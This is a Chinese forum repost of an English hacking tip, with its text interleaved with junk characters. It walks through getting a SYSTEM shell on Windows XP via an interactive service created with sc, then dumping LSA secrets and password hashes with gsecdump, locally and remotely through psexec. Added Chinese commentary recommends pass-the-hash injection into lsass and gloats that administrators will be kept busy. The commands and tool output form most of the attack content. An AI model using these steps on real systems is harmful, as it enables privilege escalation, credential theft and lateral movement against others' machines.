o get a DOS Prompt as NT system:' O) `% {3 I( Z9 P+ E& i
$ m1 E3 F5 ^; Z/ k. Z; @5 }0 ?
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact( z5 q& N/ I0 M" p3 l* h
[SC] CreateService SUCCESS
g5 C( \. b7 d! B' h+ d! c* e! k+ T9 y! u
C:\>sc start shellcmdline3 p/ O! e# O* i
[SC] StartService FAILED 1053:
. D, {$ Y( G, n. w T
4 q$ `8 Q, u+ s7 V8 o1 b) ^: oThe service did not respond to the start or control request in a timely fashion.
- c- k# X5 I2 b4 a# a9 B6 o1 J% }5 C0 e# l0 l
C:\>sc delete shellcmdline* J4 x8 a) ]- F' A
[SC] DeleteService SUCCESS
* L: {- p: i) e, ]* ] e0 e9 d; ^! t1 M. s$ M D
------------
- R! K8 _0 q4 _9 l0 O" g/ R- S9 [% v" m' |
Then in the new DOS window:
$ ^, c% |% |+ K1 u5 |
" D- _3 l9 ]- s$ @, X9 |Microsoft Windows XP [Version 5.1.2600]
: J: t, G+ b' w+ |0 M(C) Copyright 1985-2001 Microsoft Corp.5 j4 q7 M% m4 N' v$ l; }
: j/ w9 c. Z6 @& I( D" }
C:\WINDOWS\system32>whoami
3 m0 `( H2 \0 kNT AUTHORITY\SYSTEM/ ?& v$ b) A0 p9 W, Z
0 u! O4 ?' T2 s q9 o" r$ Y
C:\WINDOWS\system32>gsecdump -h& _5 ?) ]3 C8 I0 T' y3 U- w
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)0 H4 R& g0 u" Y+ {4 Y+ U7 \
usage: gsecdump [options]9 F* O% y5 \; g8 N/ B
# R2 G+ E0 g: j& v+ _$ h
options:
( Q) f3 G$ d6 G5 N-h [ --help ] show help0 _ e7 q) F/ V3 D- ~
-a [ --dump_all ] dump all secrets
* d2 M3 v( f4 W( [-l [ --dump_lsa ] dump lsa secrets5 L, _8 d: f4 \. u- S; |7 c) T
-w [ --dump_wireless ] dump microsoft wireless connections
6 Z) x0 U3 k2 F. H5 c/ i; y+ P( u-u [ --dump_usedhashes ] dump hashes from active logon sessions! |( d n! J; | ?1 S
-s [ --dump_hashes ] dump hashes from SAM/AD
' ^, T5 p3 k- }, A% n
+ ?) y% x- H' u0 V0 sAlthough I like to use:: b. i! T6 ]- q9 E
. n5 S3 [* B. I8 j* q# F
PsExec v1.83 - Execute processes remotely9 x' B9 z) g4 P/ i
Copyright (C) 2001-2007 Mark Russinovich
( e3 J! s+ n1 r& F3 f' ^+ D) W) \Sysinternals - 链接标记[url]www.sysinternals.com[/url]
, e: Y4 S F! c# l, l4 O7 {* q* S! b
: |, R! J' w; q0 e/ Q! \C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
/ j! l! N- m3 I! N+ x9 }
; H" G% Y* ~2 }. Z4 w9 ]to get the hashes from active logon sessions of a remote system.
! p: t G! I1 `& M- G
4 s( N0 A5 r2 c( WThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
* ]/ c+ ?) o, U6 V# {. `/ I$ z' c" J5 ?: j( t$ {! w( w
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.% A+ c6 r" x2 n4 L
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
$ d) A- w$ L6 N5 r: N, E6 J5 y2 Q' [* C( d7 I$ b2 D
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。6 x1 V. ~# r8 }; s) k
|
发表于 2012-11-6 21:09:29
收藏
支持
反对